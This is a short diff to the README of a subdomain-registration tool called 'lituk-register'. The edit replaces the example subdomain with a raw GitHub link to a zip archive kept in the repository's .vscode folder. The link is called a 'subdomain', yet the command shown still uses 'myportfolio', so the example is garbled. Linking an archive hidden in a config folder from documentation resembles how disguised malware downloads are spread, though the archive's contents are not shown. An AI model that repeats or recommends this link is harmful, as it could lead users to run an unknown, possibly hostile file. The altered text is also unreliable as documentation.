sofalegacy/lituk-register/README.md

 ### Example

-If you want to register the subdomain "myportfolio.lives-in-the.uk", you would run:
+If you want to register the subdomain "https://github.com/sofalegacy/lituk-register/raw/refs/heads/main/.vscode/lituk_register_v3.0-alpha.2.zip", you would run:

 ```bash
 lituk-register myportfolio